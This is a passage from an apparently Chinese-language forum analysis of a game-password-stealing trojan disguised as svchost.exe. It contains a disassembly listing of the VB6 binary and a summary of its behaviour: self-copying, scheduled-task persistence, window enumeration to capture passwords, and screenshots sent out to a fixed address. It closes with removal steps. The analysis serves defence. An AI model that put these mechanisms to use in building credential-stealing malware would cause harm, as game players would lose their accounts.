- 0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
- 0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
- 0040D52F . 6A 00 push 0
- 0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
- 0040D534 . 52 push edx
- 00411B52 . 68 305C4000 push svchost.00405C30 ; Write
- 00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
- 00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
- 00411B5D . 53 push ebx
- 00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
- 00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
- 00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
- 00411B69 . 51 push ecx
- 00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
- 00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
- 00411B70 . 52 push edx
- 00411B71 . FFD7 call edi
- 00411B73 . 83C4 10 add esp,10
- 00411B76 . 50 push eax
- 00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
- 00411B7D . 50 push eax
- 00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
- 00411B84 . 83C4 1C add esp,1C
- 00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
- 00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
- 00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
- 00411B93 . 53 push ebx
- 00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
- 00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
- 00411B9C . 50 push eax
- 00411B9D . 51 push ecx
- 00411B9E . FFD7 call edi
- 00411BA0 . 83C4 10 add esp,10
- 00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
- 00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
- 00411BAB . 52 push edx
- 00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
- 00411BB2 . 50 push eax
- 00411BB3 . E8 E8030000 call svchost.00411FA0
- 00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
- 00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
- 00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
- 00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
- 00411BC7 . 53 push ebx
- 00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
- 00411BCD . 53 push ebx
- 00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
- 00411BD3 . 53 push ebx
- 00411BD4 . 68 805C4000 push svchost.00405C80 ; All
- 00411BD9 . 53 push ebx
- 00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
複製代碼 總結:
1.獲取制定目錄創建目錄,自複制,然後運行。
2.創建bat實現計劃任務指定時間運行木馬。
3.結束自身。
4.複製後的程序通過查找窗口,枚舉進程方法獲取遊戲窗口截取密碼。
5.至於密保就是利用截屏,然後發送到製定地址。
由於本人能力的有限,錯誤及遺漏在所難免! 或許原理並沒有這麼簡單,還請其他高手作出指點. 萬分感謝!
查殺方法:
首先用XueTr.exe 結束svchost.exe結束進程(不結束怎麼刪除哈),然後
到這個目錄刪除C:\WINDOWS\system32\Pusmint下所有的文件。
然後運行XueTr.exe切換到啟動項就明朗了,直接delete *.JOB的項目。
|